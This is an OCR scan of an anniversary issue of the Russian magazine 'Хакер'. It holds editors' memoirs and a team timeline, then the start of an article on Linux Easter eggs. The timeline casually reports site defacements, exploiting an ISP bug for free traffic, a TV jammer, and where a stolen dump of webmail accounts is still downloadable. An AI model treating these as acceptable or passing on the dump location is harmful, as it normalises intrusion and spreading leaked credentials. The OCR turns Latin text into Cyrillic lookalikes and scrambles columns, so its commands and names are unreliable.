последний номер так и застрял то ли 
в типографии, то ли натаможне во 
время августовского кризиса. Ноуже в 
ноябре-декабре Сергей позвонил мне и 
предложил делать новый журнал. 

Я писал разные статьи, но всем особен- 
но запомнилась глушилка для телика. 

Сконструировал я ее совершенно 
случайно, когда экспериментировал 
с цифровым генератором. В комнату 
вошла бабушка и спросила, чтоу нее с 

телевизором. Оказалось, что глушак можно сделать на трех деталях. Это 
была бомба. На Митинке юные радиовредители спрашивали у продав- 
цов микросхему «лаз» (от слова лазить), на самом деле 1 55ЛАЗ (ЛАТРИ). 
В интернете все копировали схему. Ав компанию даже пришел какой-то 
циркуляр из госструктур о том, что устройство страшно вредоносное. 
Покровский объяснял: «В МКнаписали, что какой-то маньяк прихлоп- 
нул девочкутопором. Если еще кто-то решит использовать топор для 
подобных целей, нельзя же будет обвинять в этом журналистов. Также и 
схакерскими методами». 

В первом «Хакере», какэто ни удивительно, прохакбыло всего несколь- 
ко страничек. Остальное — игры. И нам постоянно писали читатели: 
«Задолбали игры, надо больше хака!». Покрович активно искал новых 
людей втеме, и скоро игровой раздел сократили. Сразуже пошли пись- 
ма: «Слишком много хака, больше игр!». 

Но назаддороги не было! Уже сформировалась достаточно сильная коман- 
да хак-авторов. Иногда Серега нас собирал в «Рванище» (компьютерном 
клубе «Нирвана» недалеко отТрубной площади). Там наверху стояли компы 
с вечно глючным инетом, а в полуподвальном баре бухала наша команда. 
Особенноэтим всегда отличались Муки Гек. Был там и великий Кибизойд 
со своей подружкой из какого -то жестко го вуза с математическим уклоном. 
Мы обсуждали с ней способы расчета ротора и дивергенции. 

Позже кто-то из рванистов поведал мне, что Киби в каком-то классе 
школы сломал себе ноги и руки и ходил в гипсе с железной обвеской, как 
терминатор. Его стали звать киборгом, что потом и трансформировалось 
в Кибизойда. 

Как-то, во время ссоры с Покровичем, Киби повесил в инете сайт«Как 
меня прижимали в “Хакере”», а Серега обещал ему отрезать пальцы 



гильотиной для сигар. Милые бранятся — только тешатся. 

Однако игровое прошлое«Хакера» давало о себе знать. Так появился 
замечательный ка проредактор Холод на своей супермашине Бешеной 
Антидевственнице. На одной изтусовокэтотсмельчак подарил Покров- 
скому свинцовый бюстЛенина. Сходство уловили все. ЕщеХолод очень 
переживал за Сайдекса, который поднимал больше бабла, чем он. Это 
неудивительно. Сайдекс был действительно квалифицированным чело- 
веком и ктомуже пытался на одной изтусовокубедить меня, что вжизни 
главное — деньги и власть. Несмотря на это, Сайдекс куда-то со време- 
нем слился, а Холод стал первым главредом журнала «Хакер Спец». 
Нельзя не сказать о Руслане Рубанском — арт-директоре, который 
оформил довольнотопорный «Хакер» в настоящем киберпанковском 
стиле. Руслан до сих пор продолжает воплощать киберпанковские мечты 
вжизнь. Рубрика «Имплант» — какраз его идея. Ая стал первым автором 
этой рубрики. Моей целью было показать, что реально происходящее у 
нас под боком (в этих маленьких НИИ) намного круче, чем высосанные 
из пальца сочинения фантастов. 

Послеухода Руслика Серега почему-то перестал принимать мои статьи. 

И Холод позвал меня работать в «Хакер Спец». Там-то и сформировался 
костяк команды, которая делает сейчас «Железо». 

Однако мы продолжали сотрудничатьс Покровским и позже. Например, 
Сережа говорил: «Нужно шире смотреть на хак. Хакеры могутхакнуть 
все, не надо зацикливаться только на компах! Можно взломать все: от 
человеческих мозгов до автомата, продающего газировку». И я нашел 
человека, который умел ломатьавтоматы с газировкой! Какты думаешь 
где? На литературном вечере студенческой газеты «Насквозь». Но это 
уже другая история... 



О 

О 

О 

СМ 

со 

о 



• «Хакер» стал О 


• Фаллический О 

о 


• Куттер заре- 


толще: теперь 104 О 


Символ о 


лизил свою 


полосы вместо 96. 


Тысячелетия и 


программу 


Вышел первый о 


автор игры «10 ^ 


таіІсиЕехе 


комикс! 


пальцев — один 


для грабин- 


• Ваня Куттер 


член», Даня 


га етаіі- 


написал свою 


начал трилогию 


адресов. 


первую ста- 


«Эрегированный 


Первобытный 


тью в журнале: 


Космос». В это же 


инструмент 


«Взломанный 


время основана 


спамеров 


Ѵіііиаі Аѵепие». 


секте «Минет у 


2000 года :). 




Ослика». 





о 

о 

о 

см 

см 



• Степан ака 5іер написал 
первую статью в журнале: 
про А5Р, тогда еще не БОТ 
ЫЕТ. 

• В редакцию пришло гнев- 
ное письмо от фидошника 
Апіоп Тагазепко :). Этот чувак 
возбух из-за статьи «Вся 
правда о ФИДО», в которой 
рассказывалась вся правда о 
фидоразме. 



• Канал #хакер 
на далнете был 
злостно закрыт 
сучкой-иркопом 
Барбарой за раз- 
говоры о кардинге. 
Синтез дошел с 
переговорами до 
президента США 
Билла Клинтона, но 
амеры не уступили. 



• Чтобы не обла- 
мываться, сделали 
канал #х на рус- 
ском далнете. Но 
он так и не нашел 
былого признания. 

• Никитос написал 
первую статью 

в журнале: про 
первобытный 
взлом провайдера 
«Россия-он-лайн». 
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Хакер'2003: 

«Прогдля массо- 
вой рассылки спама 
сейчас пруд прудИр 
однако хороших 
среди них не так уж и 
много!» 



о 


• Новый релиз 

О 


• Почта в домене 

О 


• Андрюшок вмес- ^ 


• Баггзи поло- 

О 


• «Хакер Спец» ^ 


• Долгое время у 


о 


Куттера: баіаріре. о йхакер.ги стано- о те с Никитосом О 


мал электронную О 


превратился из О 


нас для почты и 


СМ 


СЧ 

рі. Перловая реа- 


см 

вится народной: 


СМ 

написали о методах 


версию «Хакера» 


СМ 

спецвыпуска 


прочих дел были 


1Г> 






г см 




С"*» 




о 


лизация софтины, о 


регистрация о 


получения бес- 


и написал нам о Хакера в отдельное о 


цифровые пароли. 




которая форвардит 


доступна каждому. 


платного трафика 


об этом статью. 


издание, выходя- 


Один чел прознал 




іср-пакеты. 


Редакция пере- 


в локальных сетях. 


Спасибо за науку :). 


щее 12 раз в год. 


это и подобрал 






езжает в элитную 


Провайдеры потом 


• Журнал опять 


Первую команду 


пасс от аккаунта 






зону геаі.хакер.ги. 


еще долго их пре- 


прибавил в толщи- 


возглавил Холод. 


ерзііоп’а, после 








следовали с раска- 


не — теперь 1 12 




чего повесил на 








ленными вилами. 


полос. 




сайте дефейс. 
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^ сцена 



2 роІ 50 П$: 



Трудно ли было принимать журнал у Синтеза? Нет, трудно было другое 

— быть вторым главредом после такого мегалегендарного чувака. Хотя 
в журнале я с первого номера, начинал автором, первые статьи мы 
делали еще в конце 1998 года... Тогда я писал про игры. Кстати, мало 
кто помнит, что «Хакер» начинал как игровой журнал. Не веришь? 
Попробуй откопать первый номер — там 80% полос про игры и 20% 

— про взлом. 

Потом, конечно, все изменилось, нас реально проперло писать про «ГГ 
секьюрити», как мы это называли в беседах с серьезными организаци- 
ями. Сначала я стал редактором раздела «Эоузііск», ну а потом ночью 
придушил Синтеза... хе-хе, шучу. 

Обычно байки «бывалых» начинаются словами: «А вот был у нас 
однажды такой случай...» Раз уж я выступаю в качестве главреда на 
пенсии, то поделюсь, пожалуй, историей из серии «только вчера рас- 
секретили». 

Была у нас однажды обложка с обнаженкой. Там такая секси девочка 
сидела на корточках. Тогда прошло только несколько месяцев с момен- 
та, как я вступил в должность. И надо ж было так лохануться — на 
обложке номер и месяц журнала указали неправильно! Верстальщик, 
кажется, забыл поменять инфу с предыдущей обложки, редактор про- 
смотрел, я тоже не обратил внимания. И все, привет — на таможне и с 
распространением целая проблема: по бумагам номер один, согласно 
обложке, другой. К тому же если бы журнал в таком виде поступил 
в продажу, читатели точно начали бы путаться. В общем, решили в 
срочном порядке напечатать наклейки на обложку с правильными 

I 



данными. Как раз наудачу это был юбилейный номер, так что на 
наклейке написали крупно «Нам 5 лет!» и мелко так номер и месяц. В 
последний момент перед засылкой наклейки в типографию мы обнару- 
жили, что и на ней дата была неправильной! То есть мы умудрились во 
второй раз перепутать текущий месяц! Хотя ничего не курили, честно! 

Наш директор по распространению (на его плечи ложился весь гемор) 
сказал так: «Правильно, ребята, если лажать, то лажать по-крупному!» 

В общем, на наклейке мы все исправили, зато, когда ее напечатали, мы 
прифигели — она была не того размера. Это был финиш. Ее все равно 
пришлось клеить на обложку, при этом у сексуальной девчонки оказа- 
лась полностью заклеена голова. Мы думали, номер будет провальным. 
Думали, все, конец, читатели нас порвут. Оказалось, что это был самый 
тиражный номер за тот год, и еще долго нам писали письма с просьбой 
прислать этот номер или его обложку. Кстати, тогда я единственный раз Ш 
в жизни оштрафовал сам себя... За раздолбайство. 

Потом у меня был свой проект — журнал «Лучшие Цифровые Камеры» 

Мы запустили его в 2004 году, а в настоящее время это один из лиде- 
ров рынка и самый грамотный гид по выбору фототехники (не могу 
удержаться от рекламы, сорри!). Сейчас мы вместе с КІоаб (думаю, 
ты его помнишь по «Хакеру», «Спецу» и «Железу») рулим цифровой 
группой в нашей медиакомпании, так что если хочешь настучать на 
Никитоса, можешь писать мне :). А в свободное время я беру в руки 
фотик и иду снимать все, что вижу. Или по старинке сажусь за гамесу 
(предпочитаю олд скул). Только его, времени, как всегда, ни на что не 
хватает. Зато жизнь бьет ключом. 



СМ • Создание первой 
О тестовой лабора- 

(М 

' ■ тории в медиаком- 

00 

^ пании. Руководил 
ею пОаб, а Порох и 
Федя занимались 
тестированиями. 



СМ • Появление руб- 

О 

О Р ики «Инсайд». 

М Вто время ею 
^ занимался пікііогг. 
Первый выпуск 
был о жестких 
дисках. 



СМ • Используя про- 
О стейший сканер 
безопасности, 

^ белорусский парти- 
зан нашел на сайте 
установленную 
систему рігапба. 
Используя стандар- 
тный пасс и логин, 
чувак добился 
заметных успехов. 



СМ • Победа хакеров 

О 

О над геймерами: 

СМ 

. игровая рубрика 
«Эоузііск» больше 
не существует. 

Игры теперь оста- 
ются только на 
двух полосах «Зала 
суда». 



СМ • Ядовитый заду- 

О 

О шил Синтеза 

СМ 

■ подушкой и стал 

СМ 

главным редакто- 
ром «Хакера». А 
Синтез оправился 
и занялся работой 
издателя всех циф- 
ровых журналов 
ѲатеІапсГа. 



СО • Неизвестные чува- 

О 

О ки сперли огромный 

СМ 

■ дамп со всеми акка- 
СО ~ г- 

О ми нашей веб-почты, 

которую мы отдали 
одной левой конто- 
ре. Дамп до сих пор 
доступен тут: 
ѵѵѵѵѵѵ. в е с и г і Іу Іа Ь . г и /_ 
іооІ5/хак0р_ги.2Ір. 
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05.2003 




• Баггзи опять 
поломал наш сайт 
через зцМщесбоп. 
Повесил дефейс: 



2 * Крис Касперски 

О начал свою работу в 

СЧ 

. «Хакере», написав 
О статью «Секреты 



СО • При помощи 

О 

О С55-бага ребята 

из МабРискегг 

Гч 

О поимели наш чат і 



СО • Появилось 

О 

О много идеи 
о хакерском 
стафе, и мы 



• На обложке первого 160- 

О , 

О полосного номера был жест- 



. кий баг: февральский номер 



^ 2004 года был представлен 



ч^ 1 • Никитос 

О 

О стал 

редактором 

(V) 

^ «Взлома», 



«сЫасесІ Ьу Агѵі Ше 


маскировки». 


повеселились над 


стали выпус- 


как декабрьский 2003 года. 


Клуниз 


Наскег, ребята, с 


С этого времени 


админом. После 


кать версию 


Чтобы хоть как-то исправить 


— «Кодинга>: 


праздником вас!» 


мы очень активно 


этого мы поняли, что 


журнала с 


этот баг, на это место решили 


Майндворк 


Дело было 9 мая. 


сотрудничаем с 


пора заняться усо- 


2 дисками. 


сделать наклейку с верными 


— «Сцены», 


Дабл респект! 


Крисом; ОН ОДИН ИЗ 


вершенствованием 


Тогда этим 


сведениями. В результате 


а Андрюшок 




наших самых автори- 


чата :). 


занимался 


сделанная наклейка почти 


— рубрики 




тетных авторов. 




еще Хинт. 


полностью закрывала лицо 
красавицы на обложке :). 


«ІІпіхоіб». 
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сцена 



» 




Бублик: 

Ах, «Хакер»... Как много было в этом слове, когда учился я в 10-м. 
Покупал каждый номер, ждал его с нетерпением, а потом читал и 
половину не понимал. Но мне это совершенно не мешало продол- 
жать его трепетно любить и тайно обожать. Помню, сначала журнал 
иллюстрировали картинками от Грифа. Меня очень перло, как он 
прорисовывал груди у девушек. Поэтому половина материала у меня в 
мозгу не осаждалась — будучи в пубертатном возрасте, я пялился на 
рисунки. Через пару лет мне пришлось переехать из славного города 
Новосибирска в город-герой Москву и осесть здесь, видимо, на всю 
жизнь. Я поступил в Университет связи и информатики и без особого 
желания грыз гранит науки, если на это оставалось время после еже- 
дневного распития пива. 

В общем, жизнь текла размеренно и однообразно. И продолжалось это 
до тех пор, пока я снова не купил журнал и твердо не решил попасть 
в команду Х-сгеѵѵ. Как я только не пытался это сделать: и статьи писал 
на ящик Ядовитому, и свой журнал хотел сделать, и с Куттером ругался 
по мыльнику. Нет, говорят, стань крутым, тогда попадешь. 

И вдруг я стал крутым. Я стал крутым ІСО-хакером и пересел на пяти- 
знак. Меня зауважал весь интернет-андеграунд, мне стали поклонять- 
ся миллионы. И тут... Его Величество Случай... 

Случилось нам с Куттером познакомиться в асе и разболтаться не 
по-детски. Болтали долгими ночами обо всем. Потом выяснилось, что 



учимся в одном институте, в одной группе, только с разницей в год 
(этот хмырь учился на курс младше). В итоге в февральский номер 
2004 года я написал сразу два материала: «Выгибаем большую лапу» 
про баг на бигфуте и «Сетевые баламуты», где я описал всю подногот- 
ную спама по І_5еек_Уои. 

С тех пор все стало стремительно меняться. Симбиозис ставит меня 
вести «Хумор»; Куттер становится главредом; я вылетаю на второй 
год, становлюсь одногруппником Куттера, начинаю вести «РС_2опе» и 
«Юниты». Происходят постоянные командные алкогольные сборища у 
НСД на квартире (он, кстати, наш с Куттером одногруппник). Доходит 
беспредел даже до криминала (во как сказал): Степ с Форбом меня 
подсаживают, и я на трехметровой высоте ломаю камеру наблюде- 
ния (естественно, пьяные были все) — еле убежали от рогатых. Мы с 
Никитосом в метро натыкаемся на работника ФСБ; я получаю от него 
в челюсть, потом, пытаясь удрать, показываю ему средний палец, и 
это заставляет нас стремительно ускориться. Клево было, все пати и 
встречи проходили беспокойно, но весело. 

А еще была «вечеринка» в редакции. Там мы с Сашей Лозовским 
выжираем две бутылки вина и бутылку водки. После этого Саша как 
истинный друг заблевывает сортир и не убирает за собой. Это палит 
уборщица. Далее — донос начальству, дикий штраф. Отработка штра- 
фа. Развал команды. Уход. 



• Куттер — главный 
редактор «Хакера». 
Ядовитый занимает- 
ся собственным про- 
ектом — «Лучшие 
Цифровые Камеры». 

• Олег N50 начал 
славную традицию 
видеоуроков взлома. 
Впервые было выло- 
жено сразу 3 видео! 



^ • N50 запустил 
О первый конкурс 
взлома на сервере 
рабопак.ги. 

• Стартовал безум- 
ный проект «Треп 
с читателями». 
Редакционные 
телефоны завалило 
сообщениями, и их 
приходилось даже 
иногда выключать. 



\Г) • Опять поломали 
§ наш сайт. Наши 
™ кодеры совсем 

с\і 

' ^ ступили и через 
полтора года после 
предыдущего взло- 
ма их опять ткнули 
носом в землю. 
Через идиотский 
баг в ѵѵеЬ-сервере 
поломали 
сЬаСхакер.ги. 



^ • Горлум напоил 

О Куттера и заставил 

СМ 

■ сделать его редак- 
О тором «Кодинга». 
Лозовский стал 
выпускающим. 



^ • В Москву 

О приехал Кевин 

Митник. После 

СМ 

О пресс-конфе- 
ренции пікі 1 ;о 22 
позволил ему 
сфотографиро- 
ваться с собой, 
подарил журнал и 
посоветовал учить 
русский. 



^ • Наш теперешний 

О крутой автор и 

СМ 

■ ведущий «Х-кон- 

О курса» ХаСо через 
баг зцМщесбоп 
повесил плейн- 
текст дефейс на 
сайте. Такое вот 
оно — подросшее 
поколение :). 
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• Хинт просрал на 
2 недели сроки 
сдачи диска, был 
оштрафован на 18 
зарплат и уволен. 



ІЛ 


• Ваня, Бублик ІЛ 


• Медиакомпания 


і • Вынужденное 


• Была сделана 


• Вышел пос- 


о 


п ~ ° 




і О 


О 




о 


и Лозовский о 


Оаппеіапа и редакция ^ 


і появление в журнале о 


попытка выпус- о 


ледний номер 


СМ 


СМ 

пили водку в 


«Хакера» вместе с ней ^ пугавшей читателей 


СМ 

кать журнал ■ 


«Ха кера», 


о 


00 

старом офисе о 


переехали из старого и 


СМ 

( рубрики «Дизайн». ^ 


СО 

толщиной 192 ^ 


которым руко- 




и прощались с 


уютного, но очень тесного 


Она пришла к нам из 


полосы, кото- 


водил Куттер. 




родными стенами. 


офиса в новый — боль- 


закрытого журнала 


рая потерпела 


Ваня ушел 




Заблевали все 


шой и просторный. 


БОА. «Хакер» взял на 


неудачу из-за 


из журнала 




вокруг. 




себя обязательства 


неготовности. 


и занялся 








неудавшегося журнала 


Отложили на 


электронной 








для дизайнеров. 


будущее. 


коммерцией. 
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|Читатѳль принес нам пиво, чтобы обменять его на свѳжий журнал^Дпікііогг вручил Кѳвину Митнику самый хакерский в мире журнал.| 



с автографом 



ПІкІІ022: 



Забавное это было времечко — 1999 год. Я тогда был очень сильно увле- 
чен компами, проводил за монитором дофига времени, периодически 
радуясь разным компьютерным проделкам вместе с одним приятелем. 
Помню, увидел в киоске журнал «Хакер» и сразу купил его. Тогда для 
меня было реальным шоком то, что печатный журнал может быть таким :). 
Я нашел в этом журнале своих единомышленников. «Хакер» в то время 
открыл для меня новую страницу и очень сильно увлек новыми вещами. 
Достаточно быстро я начал изучать то, о чем раньше даже и не знал: 
различные ІІпіх-системы, ѵѵеЬ-программирование и т.д. Через какое-то 
время я обнаружил достаточно примитивный баг, с помощью которо- 
го можно было активно нагревать крупного провайдера того времени 
— «Россию-он-лайн». Некоторое время поюзав баг, я решил написать об 
этом в любимом журнале. Так началась моя работа в «Хакере». 

В дальнейшем я писал исключительно о том, что мне самому было инте- 
ресно. Я занимался ѵѵеЬ-программированием и безопасностью ѵѵеЬ-сис- 
тем — и писал об этом статьи. 

Через какое-то время начался другой важный этап в моей жизни. Я 
поступил на факультет прикладной математики в МАИ и познакомился 
там с худым, нервносмеющимся и странноватым чуваком, который сразу 



сказал, что хакер — это либо он, либо кто-то из его друзей. Этим чуваком 
был Горлум, с которым мы к тому времени несколько раз пересекались на 
#хакер, но фактически не общались. В итоге, мы сдружились и первые 
два курса достаточно крепко бухали, исправно сдавая всякие экзамены. 
Параллельно с этим мы подумывали заниматься разными хакерскими 
штуками. 

Примерно в это же время Ваня Куттер предложил мне вести рубрику 
«Взлом». Сам он стал главредом «Хакера», а я с охотой согласился на 
его предложение — мне это было очень интересно. Коля тогда работал 
редактором в «Спеце» и занимался «Кодингом» в «Хакере». 

Потом Ваня ушел из журнала в электронную коммерцию, и Синтез 
предложил возглавить журнал мне. Так сложилось, что на тот момент в 
журнале было несколько серьезных проблем: Ваня ушел почти со всей 
прежней командой и мне нужно было достаточно оперативно создавать 
новую. К тому же тогдашний арт-директор «Хакера» Костя Обухов конк- 
ретно забивал болт на журнал, и каждый номер мы сдавали с нехрено- 
выми траблами и задержками. Это было суровое время, мы с Горлумом 
торчали в редакции сутками. Но в итоге все постепенно рассосалось, и 
сейчас у меня отличная команда :]. 



• Главным редактором чО 
журнала стал пікііо 22 . § 

• Горлум напоил ^ 



пікііо^г’а и стал выпус- ѳ 
кающий редактором. 
Лозовского отправили 
обратно в «Кодинг». 

• Отказались от версии 
журнала с двумя Сй. 
«Хакер» комплектуется 
только 0Ѵ0. 



• Редактором чО • Редакто ром чО 
рубрики «Взлом» § «РС_2опе» § 
стал Степ, а 

СЬ + І ІГГППѴ/ІІ/ ..О-тліілм.. 



ненадолго стал 
ЭЫшгтоѵік. 

• Вышел послед- 
ний номер, который 
дизайнил Костя 
Обухов. После этого 
несколько месяцев 
работали времен- 
ные люди. 



, «Взломом» 
занялся 
переехавший 
в Москву 
РогЬ. 



•Мегаакция с чита- 
телями. Летний пик- 
ник-бухач. Пришло 
больше 100 человек, 
было куплено и 
выпито около цен- 
тнера пива. Бухие 
читатели были раз- 
давлены командой 
редакции в футболь- 
ном матче. 



чО • Ситнез ушел из 

О 

О компании и занял- 

<4 ся своим делом. 

ОО 

^ • Арт-ди ректором 
«Хакера» стал 
Женя Новиков. 

Мы нашли его во 
дворе пьяным и с 
гитарой. Посадили 
за компьютер, и он 
стал дизайнить. 



чО • Наш бывший чО 

О л ° 

^литредАня о 

<4 Большова, обна- 
^ ружив ошибку в ^ 
названии статьи 
«ѴѴЕВ-сервис для 
КПК», исправила 
ее: «ѴѴЕВ-сер- 
виз для КПК». 
Рыдали всей 
редакцией :). 



• Хакерский 
ОѴБ теперь 
двухслойный. 
Степ плакал. 
Видимо, от 
счастья. 
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1» ЯРЕМЧУК 

спшоев@ііа.гм / 



ПИНГВИНЬИ ЯЙЦА 



ЁА5ТЕК Е665 В ПРИЛОЖЕНИЯХ ЫЫУХ 



Пасхальные яйца уже стали привычным атрибутом современных приложений. Так раз- 
работчики напоминают о себе, привлекают внимание к программному продукту, а иног- 
да просто занимаются ерундой в рабочее время, вместо того чтобы всячески совершенс- 
твовать свой проект. Традиционно считается, что в приложениях с открытым исходным 
кодом не может быть никаких вложений, в том числе и пасхальных яиц, так как такие 
программы пишут только серьезные бородатые дядьки с неулыбчивыми лицами, среди 
которых нет места шутникам, да и любой желающий может проверить код на чистоту. 



О Пингвинье сердце 

«І_іпих баз по Еазіег Еддз. ЫпихапсІ ІІпіх 
а рріісаііопз депегаііу сіо поі баѵе Еазіег Еддз. 

ѴѴе кпоѵѵЬесаизеѵѵе сап геѵіеѵѵіИезоигсе сосіе» 
— именно так сказано на одном из тематичес- 
ких ресурсов. Большинство разработчиков (за 
редким исключением) на поддержку своего 
продукта тратят свое личное время, которого 
мало и потому жалко. Даже как-то грустно стано- 
вится: неужели среди тысяч программистов не 
нашлось ни одного шутника и порадовать своих 
друзей необычной находкой пользователю 
Ыпих.увы, не суждено? Отнюдь! 

Начнем, естественно, с самого сердца. Здесь 
комментарии разработчиков говорят сами за 
себя: 



$со/и5к/5кс/і_ших 
$ ЕСВЕР -ір ,, (ри?к)і(5Ніт)іі5тирт) м * 

іпсіисіе/азт/хог . Ъ. : СІоЬЬег 
Скет зизС Со Ье зиге поЬосіу сіоез 
зотеЫгіпд зСирісі 
іпсіисіе/ііпих/ СЪ . Ъ. : #ОеСіпе 
ЗТПРІБ_АССЕЬР_ТЕХТ_ЗНІТ 
/* ЬосаСе гесогсі бог зкирісі 
сіеѵісез. */ 

/* I сіоп ' С кпоѵт Ске гапде . РиС 
зкирісі Скіпдз кеге */ 

/* 5М1: каррепз . . . */ 
ІіЬ/ѵзргіпСС . с : * Міггепіиз 
чл/гоСе Скіз рогСаЫу, 

Тогѵаісіз 

С* * *ес! ІС ир : - ) 



Или воттакой запрос: 

$ЕеРЕР-ІК ,, (РІВЕ)$ м * 

/* Тигп оп СгапзшіС Тіпізкесі 
іпСеггирС . Ѵ7і 1 1 Сіге іттесІіаСеІу ! 
*/ 

сігіѵегз/изЬ/сІазз/изЫр . с : зСаСіс 
скаг *изЫр_теззадез [ ] = { "ок", 

" оик об рарег" , "оСС-Ііпе" , "оп 
Сіге" } ; 

Причем принтер действительно ругается в 
консоль, что он «горит». Также заслуживают 
внимания и имена функций, параметров 
и переменных, которые занесены в файл 
зипЬгпе.с: 
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> Крестики-нолики в ОрепСШісе.огд Саіс 




$ І_Е55 0РІѴЕР5/МЕТ/51ІМНМЕ.С 

МОШЕЕ_РАКМ_БЕ8С (шасасМг, "Нарру 
Меаі МАС асісігезз бо зеб") ; 
збабіс збгисб карру_теа1 *гооб_ 
карру_с!еѵ; 

Встречаются и некоторые другие слова, которые 
кобщеупотребительным отнести можно с боль- 
шой натяжкой. 

В заголовочных и конфигурационных файлах 
других приложений также есть интересные 
строки. Например, при компиляции оконного 
менеджера ЕпІідЫептепі можно встретить вот 
такую информацию: 

скескіпд бог тазз_диапбібіез_об_ 
Ьазз_а1е іп -ІЕгісІде. . . по 
скескіпд бог шазз_диапбібіез_об_ 



$2САТ/и5К/5НАКЕ/00СДІМиХ-ІМАѲЕ- 
' ІШАМЕ -Р'/СНАМеЕЕОе.ОЕВІАМ.еі 1 
ЕбКЕР -Е "ВЕІ_ЕА5Е" 

Тке «Веп доб а Роѵ^егВоок бог 
Скгізбтаз» Кеіеазе. 

Тке «Оиіскезб ге-геіеазе еѵег» 
Кеіеазе 

Тке «Ок стар, ѵбкаб сіісі I деб 
тузеіб іпбо?» Кеіеазе. 

Тке «Абошіс Агбіскоке» Кеіеазе. 
Тке «Сгипску Сот» Кеіеазе. 

Тке «Сгізру Скіскеп» Кеіеазе. 

$ 23ВЕР М ТНЕ.*РЕІ_ЕА5Е М /ІІ5Р/5НАРЕ/ 

оос/орке/снАмеЕіое.оЕвіАм.еі 

Тке «Соосі, сіеап бип» Кеіеазе. 

Тке «Виііу'з Зресіаі Ргіге» 
Кеіеазе . 



1 1 СІ2-А769-00АА00 1 АСР42» будет выведен 
логотип проекта. 

Длятого чтобы отменить выполнение системно- 
го вызова гебооШ, необходимо передать ему два 
параметра, первый из которых — Охбее 1 беаб, а 
второй — один из следующих: 

$ екЕР і_ших_кЕвоот_мАеіс 
шсшве/і_шіш*.н 

іпсІисІе/Ііпих/геЪооб . 

к : #сіебіпе ЫШХ_КЕВООТ_МАСІС1 

Охбееісіеасі 

іпсІисІе/Ііпих/геЬооб .к: #сіебіпе 
ЫШХ_КЕВООТ_МАСІС2 672274793 
ІпсІисІе/Ііпих/геЪооб .к: #сіебіпе 
ЫШХ_КЕВООТ_МАСІС2А 85072278 
ІпсІисІе/Ііпих/геЪооб .к: #сіебіпе 
ЫШХ_КЕВООТ_МАСІС2В 369367448 



«КРОМЕ РООТ, В НЕКОТОРЫХ ДИСТРИБУТИВАХ 
ШІІХ ЕСТЬ ЕЩЕ ОДИН ПРИВИЛЕГИРОВАННЫЙ 
ПОЛЬЗОВАТЕЛЬ. НЕ ВЕРИШЬ? СОЗДАЙ ПОЛЬЗОВА- 
ТЕЛЯ ТѴІ.ЕВ С ЛЮБЫМ ПАРОЛЕМ. АТЕПЕРЬ ПОПРО- 
БУЙ ВВЕСТИ КОМАНДУ Маи ИЛИ геЬооІ» 



апу_а1е іп -ІЕгісІде. . . по 
Магпіпд : N 0 аіез тл/еге боипсЗ іп 
уоиг гебгідегабог . 

Ше кідкіу зиддезб бкаб уои 
гесбібу бкіз зібиабіоп 
ігшпесііабеіу . 

Не знаю, за что платит Марк Шаттлвортсвоим ребя- 
там изСапопісаІШ, ноонитожелюбяттратить рабо- 
чее время на развлечения. Например, таквыглядят 
названия релизов ІІЬипіи в заголовочных файлах: 



Тке «Оп Ііке Бопкеу Копд» 

Кеіеазе . 

Разработчики РНРтоже сумели отличиться. 
Добавь следующую строку к рбр-запро- 
су«?=РНРЕ9568Е36- 0428-1 1 62-А769- 
00АА001 АСЕ42» на любом из сайтов с 
установленными АрасЬе и РНР В результате 
получишь изображение симпатичной собачки, 
вид которой, как я понимаю, зависит от версии 
РНР. При запросе «?=РНРЕ9568Е34-0428- 



іпсІисІе/Ііпих/геЪооб .к: #с!ебіпе 
ЫШХ_КЕВООТ_МАСІС2С 537993216 

Посмотрим, что означают эти непонятные 
числа: 

$ РКШТР "«шгг 672274793 

28121969 

Именно в этот день (28 декабря 1969 года) в 
городе Хельсинки родился отец операционной 
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> Команда ЗіагѴѴгіІег 



системы ЫпихЛинус БенедиктТорвальдс, а уж 
кому как не ему командовать процессами в ядре. 
Остальные цифры, я думаю, ты пробьешьуже сам. 

□ Консольные утилиты 

Наиболее известное пасхальное яйцо высижи- 
вают утилиты ар! и арМибе, с помощью которых 
устанавливаются приложения в ОеЬіап, хотя в 
вариантах II Ьипііі, АІ_ТІ_іпих и Кпорріх приве- 
денное ниже тоже работает на ура: 

$ АРТ-ЗЕТ МОО 

(_) 

(оо) 

/ \/ 

/ I I I 
* /\ /\ 

. . . .«Наѵе уои гпооесі БосЗау?». . . 

Воттакая симпатичная коровка настолько что 
обмычала. А вотаріііибе (оболочка кар!) никог- 
да не признается в наличии пасхальных яиц (ну, 
только если хорошо попросить): 

$АРТГШОЕМОО 

Ткеге аге по ЕазСег Еддз іп Йіз 
ргодгаш. 

Ка к в и д и ш ь, тебе ч естн о ответи л и , что в а р! ііи б е н ет 
пасхального яйца. Ты поверил?Я нет. Придобав- 
лении к за просу от двух до шести букв«ѵ» («аріііибе 
-ѵѵѵѵѵѵтоо»), получим слона, проглоченногозмеей: 

—ѵ — Ткеге геаііу аге по ЕазБег 
Еддз іп Бкіз ргодгаш. 

— ѵѵ — БісЗп'Б I аігеасіу Сеіі уои 
Скак ккеге аге по Еазкег Еддз іп 
Скіз ргодгаш? 

— ѵѵѵ — ЗСор ІС ! 

— ѵѵѵѵ — Окау, окау, II I діѵе уои 
ап Еазкег Едд, чл/ііі уои до ачл/ау? 

— ѵѵѵѵѵ — АН гідкк, уои ѵ\/іп. 

— ѵѵѵѵѵѵ — Шкак із ік? Ік 1 з ап 
еіеркапк Ьеіпд еакеп Ьу а зпаке, 
о к соигзе. 



Кстати, етегде из Ѳепіоотоже мычит, попробуй 
«етегде тоо», убедись сам. А вот зіа рі-деі 
из Зіазкѵѵаге — нет. Его, очевидно, создают 
действительно серьезные ребята, которым не до 
шуток. Команда ѵѵбоіз, оказывается, нетолько 
может выдать информацию, взятую из базы дан- 
ных Ыеіѵѵогк Іп!огта!іоп Сепіег, но и отлично 
ориентируется в более широком спектре жиз- 
ненных вопросов. Попробуй набрать в Агк І_іпих 
«\л/ИоІ5 іЬе беѵіі» или «ѵѵбоізіЬе а піісЬ гізі». 
Кроме гооі, в некоторыхдистрибутивах Ыпих 
есть еще один привилегированный пользова- 
тель. Не веришь? Создай пользователя Іуіег 
с любым паролем. Атеперь попробуй ввести 
команду Ьаі! или гебоок Перед остановкой 
системы будет выведенотакое сообщение: «Об 
Ьеііо, Мг. Туіег, — доіпд ООѴѴЫ?» 

Под любым другим пользователем такого точ- 
но неувидишь. Очевидно, кому-то из разра- 
ботчиков нравится клип рок-группы АегозтКИ 
«І_оѵе іп ап Еіеѵаіог», в котором эти слова 
произносит симпатичная девушка из лифта. 
Однажды мне захотелосьузнать, какие строки 
